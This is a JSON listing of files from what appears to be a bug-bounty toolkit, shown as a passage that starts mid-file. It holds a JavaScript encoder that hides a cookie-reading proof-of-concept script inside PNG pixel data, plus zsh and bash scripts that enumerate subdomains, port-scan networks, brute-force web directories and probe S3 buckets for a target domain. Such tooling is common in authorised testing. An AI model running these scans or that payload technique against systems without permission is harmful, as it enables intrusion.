e : e\n    },\n    d = document,\n    b = d.body,\n    img = new Image;\n    var stringenc = \"Hello, World!\";\n    img.src = encode(stringenc), b.innerHTML = \"\", b.appendChild(img)\n})();\n\n\n(function() {\n    function encode(a) {\n        if (a.length) {\n            var c = a.length,\n                e = Math.ceil(Math.sqrt(c / 3)),\n                f = e,\n                g = document.createElement(\"canvas\"),\n                h = g.getContext(\"2d\");\n            g.width = e, g.height = f;\n            var j = h.getImageData(0, 0, e, f),\n                k = j.data,\n                l = 0;\n            for (var m = 0; m < f; m++)\n                for (var n = 0; n < e; n++) {\n                    var o = 4 * (m * e) + 4 * n,\n                        p = a[l++],\n                        q = a[l++],\n                        r = a[l++];\n                    (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)\n                }\n            return h.putImageData(j, 0, 0), h.canvas.toDataURL()\n        }\n    }\n    var ord = function ord(a) {\n        var c = a + \"\",\n            e = c.charCodeAt(0);\n        if (55296 <= e && 56319 >= e) {\n            if (1 === c.length) return e;\n            var f = c.charCodeAt(1);\n            return 1024 * (e - 55296) + (f - 56320) + 65536\n        }\n        return 56320 <= e && 57343 >= e ? e : e\n    },\n    d = document,\n    b = d.body,\n    img = new Image;\n    var stringenc = \"function asd() {\\\n        var d = document;\\\n        var c = 'cookie';\\\n        alert(d[c]);\\\n    };asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. 
Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. 
Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. 
Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. 
In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. 
Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. 
Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\\\n    Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\\\n    Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. 
Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\\\n    Vestibulum tincidunt diam vel diam semper posuere. Nulla facilisi. Curabitur a facilisis lorem, eu porta leo. Sed pharetra eros et malesuada mattis. Donec tincidunt elementum mauris quis commodo. Donec nec vulputate nulla. Nunc luctus orci lacinia nunc sodales, vitae cursus quam tempor. Cras ullamcorper ullamcorper urna vitae pulvinar. Curabitur ac pretium felis. Vivamus vel scelerisque nisi. Pellentesque lacinia consequat nibh, vitae rhoncus tellus faucibus eget. Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/\";\n    img.src = encode(stringenc), b.innerHTML = \"\", b.appendChild(img)\n})();"
  },
  {
    "path": "scripts/recon.zsh",
    "content": "#!/usr/bin/env zsh\n\n#continue on errors\nset +e \n\nautoload colors; colors\n\n__info() echo \"$fg[blue][*] $@ $reset_color\"\n__ok() echo \"$fg[green] [+] $@ $reset_color\"\n__warn() echo \"$fg[yellow][>] $@ $reset_color\"\n__err() echo \"$fg[red][!] $@ $reset_color\"\n\n############################################################# \n# Recon\n#############################################################\n\n[[ -z $1 ]] && __err \"Missing argument.\\nUsage: zsh $0 <domain> <org> <outdir>\" && exit\n[[ -z $2 ]] && __err \"Missing argument.\\nUsage: zsh $0 <domain> <org> <outdir>\" && exit\n[[ -z $3 ]] && __err \"Missing argument.\\nUsage: zsh $0 <domain> <org> <outdir>\" && exit\n\nexport DOMAIN=$1\nexport ORG=$2\nexport DIR=$3\nexport UA=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\nexport F_ASN=\"${DIR}/asn.txt\"\nexport F_CIDR=\"${DIR}/cidr.txt\"\nexport F_SUBS=\"${DIR}/subs.txt\"\nexport F_SUBS_RES=\"${DIR}/subs.resolved.txt\"\nexport F_HOSTS=\"${DIR}/hostnames.txt\"\nexport F_HOSTS_IP=\"${DIR}/hostips.txt\"\nexport F_WEB=\"${DIR}/urls.txt\"\n\nexport PORTS=\"21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200\"\n\n############################################################# \n# Startup\n#############################################################\n\n__info \"Recon.zsh running... 
\"\n__info \"Domain: ${DOMAIN} Org: ${ORG}\"\n__info \"Using current directory for output: ${DIR}\"\n\n############################################################# \n# Steps\n#############################################################\n\norg() {\n\n    __ok \"metagoofil'ing files\"\n    mkdir -p ${DIR}/files\n    metagoofil -u \"${UA}\" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 &\n}\n\nnetwork() {\n\n    __ok \"Amass'ing ASNs\"\n    amass intel -org \"${ORG}\" | cut -d, -f1 > ${F_ASN}\n\n    __ok \"BGPview'ing CIDRs\"\n    for asn in $(cat ${F_ASN})\n    do \n        if [[ ! -z ${asn} ]]\n        then \n            curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' > ${F_CIDR}\n        fi\n    done\n\n    __ok \"dnsrecon'ing PTRs\"\n    network_dnsrecon\n\n    #__ok \"masscan'ing CIDRs\"\n    #network_masscan \n\n}\n\nnetwork_dnsrecon() {\n    mkdir -p ${DIR}/ptr\n    for cidr in $(cat ${F_CIDR})\n    do \n        if [[ ! -z ${cidr} ]]\n        then\n            local net=$(echo ${cidr} | cut -d/ -f1) \n            dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1\n        fi\n    done\n}\n\nnetwork_masscan() {\n    mkdir -p ${DIR}/net\n    for cidr in $(cat ${F_CIDR})\n    do\n        if [[ ! -z ${cidr} ]]\n        then\n            local net=$(echo ${cidr} | cut -d/ -f1) \n            sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1\n        fi\n    done\n}\n\n\ndomains() {\n\n    echo \"${DOMAIN}\" > ${DIR}/domains.txt\n\n    __ok \"Subfinder'ing \"\n    subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} > /dev/null 2>&1\n\n    __ok \"crt.sh'ing \"\n    curl -s 'https://crt.sh/?q=%.$DOMAIN' | grep -i \"${DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u >> ${F_SUBS} > /dev/null 2>&1\n\n    __ok \"waybackurls'ing... 
\"\n    echo ${DOMAIN} | waybackurls | cut -d \"/\" -f3 | sort -u | grep -v \":80\" >> ${F_SUBS} > /dev/null 2>&1\n\n    __ok \"sorting results \"\n    cat ${F_SUBS} | sort -u -o ${F_SUBS} > /dev/null 2>&1\n\n}\n\nlookups() {\n\n    __ok \"massdns'ing domains\"\n    /opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1\n\n    __ok \"extracting resolved hostnames\"\n    sed 's/A.*//' ${F_SUBS_RES} | sed 's/CN.*//' | sed 's/\\..$//' | sort -u >> ${F_HOSTS} > /dev/null 2>&1\n\n    __ok \"extracting resolved IP addresses\"\n    grep -o '[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP} > /dev/null 2>&1\n}\n\nscans() {\n\n    __ok \"scanning host IP's\"\n    mkdir -p ${DIR}/hosts\n\n    for h in $(cat ${F_HOSTS_IP})\n    do\n        __ok \"...scanning ${h}\"\n\n        mkdir -p ${DIR}/hosts/${h}\n\n        nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1\n    done\n\n}\n\nweb() {\n\n    __ok \"httprobing resolved hosts\"\n    cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} > /dev/null 2>&1\n\n    mkdir -p ${DIR}/web\n\n    for url in $(cat ${F_WEB})\n    do\n        \n        __ok \"...enumerating ${url} ... 
\"\n\n        local host=$(echo ${url} | cut -d/ -f3)\n        local hdir=${DIR}/web/${host}\n\n        mkdir -p ${hdir}\n\n        __ok \"Getting IP address\"\n        host ${host} > ${hdir}/ip.txt > /dev/null 2>&1\n\n        __ok \"Curling robots.txt\" \n        curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1\n\n        __ok \"Whatwebbing\"\n        whatweb ${url} -a 1 > ${hdir}/whatweb.txt > /dev/null 2>&1\n    \n        __ok \"Wafw00fing\"\n        wafw00f ${url} > ${hdir}/waf.txt > /dev/null 2>&1\n\n        __ok \"Gobustering\"\n        gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1\n\n        __ok \"S3 Bucketing\"\n        aws s3 ls s3://${host} > s3.txt > /dev/null 2>&1\n\n    done\n\n}\n\n############################################################# \n# Workflow\n#############################################################\n\n__info \"Searching for Org OSINT... \"\n\norg\n\n__info \"Mapping Network... \"\n\nnetwork\n\n__info \"Collecting sub-domains...\"\n\ndomains \n\n__info \"Resolving sub-domains... \"\n\nlookups\n\n__info \"Scanning IP addresses...\"\n\nscans\n\n__info \"Probing web servers...\"\n\nweb\n\n__info \"Checking job completion...\"\n\nwait $(jobs -p)\n\n__info \"Recon completed\"\n\necho \" \"\n"
  },
  {
    "path": "scripts/webrecon.zsh",
    "content": "red=`tput setaf 1`\ngreen=`tput setaf 2`\nyellow=`tput setaf 3`\nreset=`tput sgr0`\n\necho -e \"[*] webrecon.zsh \"\necho -e \"[*] source: $1\"\necho -e \" \"\n\nfor url in $(cat $1);do \n    echo -e \"[*] Enumerating ${url}\"\n\n    ############################################################\n    # Make directory\n    ############################################################\n\n    host=$(echo $url | cut -d \"/\" -f3)\n\n    echo -e \"${green} [+] Making directory ${host} ${reset}\"\n    mkdir -p ${host}\n\n    ############################################################\n    # Host\n    ############################################################\n    echo -e \"${green} [+] Getting IP address... ${reset}\"\n    host ${host} | tee ${host}/ip.txt > /dev/null\n \n    ############################################################\n    # Robots\n    ############################################################\n    echo -e \"${green} [+] Curling... robots.txt ${reset}\" \n    curl -s -L ${url}/robots.txt -o ${host}/robots.txt\n\n    ############################################################\n    # Ports\n    ############################################################\n    echo -e \"${green} [+] Nmapping... ${reset}\"\n    nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null \n\n    ############################################################\n    # Whatweb\n    ############################################################\n    echo -e \"${green} [+] Whatwebbing... ${reset}\"\n    whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null\n\n   ############################################################\n    # Wafw00f\n    ############################################################\n    echo -e \"${green} [+] Wafw00fing... 
${reset}\"\n    wafw00f ${url} > ${host}/waf.txt 2> /dev/null\n \n    ############################################################\n    # Gobuster\n    ############################################################\n    echo -e \"${green} [+] Gobustering... ${reset}\"\n    gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null\n   \n    ############################################################\n    # Eyewitness\n    ############################################################\n    #echo -e \"${green} [+] Screenshotting... ${reset}\"\n    #eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null\n\n    ############################################################\n    # AWS\n    ############################################################\n    echo -e \"${green} [+] S3 Bucketing... ${reset}\"\n    # write into the per-host directory like the other results\n    aws s3 ls s3://${host} > ${host}/s3.txt 2> /dev/null\n\n    echo -e \" \"\ndone\n\necho -e \" \"\necho -e \"[*] Done\""
  },
  {
    "path": "scripts/wildcards.py",
    "content": "#!/usr/bin/env python3\n# coding=utf-8\n\n# *******************************************************************\n# *** Wildcards ***\n# * Description:\n#   A script that does recon on public bug bounty wildcard domains.\n# * Version:\n#   v0.1\n# * Homepage:\n#   https://github.com/stevemcilwain/wildcards\n# * Author:\n#   Steve Mcilwain\n# *******************************************************************\n\n# Modules\n\nimport sys\nimport requests\nimport os\n\n# Configuration\nWILDCARDS_URL = \"https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt\"\nWILDCARDS_FILE = \"wildcards.txt\"\n\n# Colors\n\ndef print_red(skk): print(\"\\033[91m{}\\033[00m\" .format(skk)) \ndef print_cyan(skk): print(\"\\033[96m{}\\033[00m\" .format(skk)) \ndef print_yellow(skk): print(\"\\033[93m{}\\033[00m\" .format(skk)) \n\n# Workflow\n\ndef download_file_from_url(url, file):\n    result = False\n\n    r = requests.get(url, allow_redirects=True)\n\n    if r.status_code == 200:\n        with open(file, \"wb\") as f:\n            f.write(r.content)\n            result = True\n    else:\n        result = False\n\n    return (result, r.status_code)\n\ndef read_domains_from_file(file):\n    result = False\n    domains = set()\n\n    with open(file, \"r\") as f:\n        for line in f:\n            if line.startswith(\"*.\"):\n                domain=line[2:].rstrip(\"\\n\")\n                domains.add(domain)\n        result = True\n    \n    return (result, domains)\n\ndef main():\n\n    print(\" \")\n    print_cyan(\"Wildcards\")\n    print(\" \")\n    print_cyan(\"[INFO] Roundin 'em up!\")\n\n    results = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE)\n    if not results[0]: sys.exit(\"[ERR] Failed to download file: {}\".format(results[1]))\n\n    print(\"[INFO] Wrangled into: {}\".format(WILDCARDS_FILE))\n\n    results = read_domains_from_file(WILDCARDS_FILE)\n    if not results[0]: sys.exit(\"[ERR] Failed to download 
file\")\n\n    #for domain in domains:\n        #print(\"Domain: \" + domain)\n\nif (__name__ == \"__main__\"):\n    try:\n        main()\n    except KeyboardInterrupt:\n            print('\\nKeyboardInterrupt Detected.')\n            print('\\nExiting...')\n            exit(0)"
  },
  {
    "path": "scripts/wildcards.sh",
    "content": "#!/usr/bin/env bash\n\n#############################################################\n# wildcards.sh\n#\n# This script is intended to run on a VPS as a cron job.\n# Run it nightly and it will any newly discovered sub domains\n# from the list of root domains that use wildcard scope.\n#############################################################\n\n# Set an environment variable in your .bashrc for your Slack webhook\n# export __WILDCARDS_SLACK=\"https://hooks.slack.com/services/<webhook>\"\n\n# Setup cron to run at a certain hour every night, example below at 2 am\n# crontab -e\n# m h  dom mon dow   command\n# 0 2 * * * /bin/bash /path/to/wildcards.sh <domain> <webhook url>\n\nDOMAIN=$1\nSLACK=$2\n\nif [[ -z \"$DOMAIN\" ]]\nthen\n        echo \"[x] Missing domain\"\n        exit 1\nfi\n\necho $(date) >> log.txt\necho \"$DOMAIN\" >> log.txt\necho \"$SLACK\" >> log.txt\n\ncurl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"Wildcards starting for $DOMAIN \\\"}\" $SLACK\n\namass enum -active -ip -d $DOMAIN\nDIFF=$(amass track -d $DOMAIN -last 2 | grep Found | awk '{print $2}')\n\necho \"Diff: $DIFF\" >> log.txt\n\nif [[ ! -z \"$DIFF\" ]]\nthen\n        curl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"$DIFF\\\"}\" $SLACK\nfi\n\ncurl -X POST --data-urlencode payload=\"{\\\"text\\\": \\\"Wildcards completed for $DOMAIN \\\"}\" $SLACK"
  },
  {
    "path": "system/hidpi.sh",
    "content": "#!/usr/bin/env bash\n\nxfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI\nxfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2\ncat <<- EOF >> ~/.xsessionrc\n\texport QT_SCALE_FACTOR=2\n\texport XCURSOR_SIZE=48\n\texport GDK_SCALE=2\nEOF"
  }
]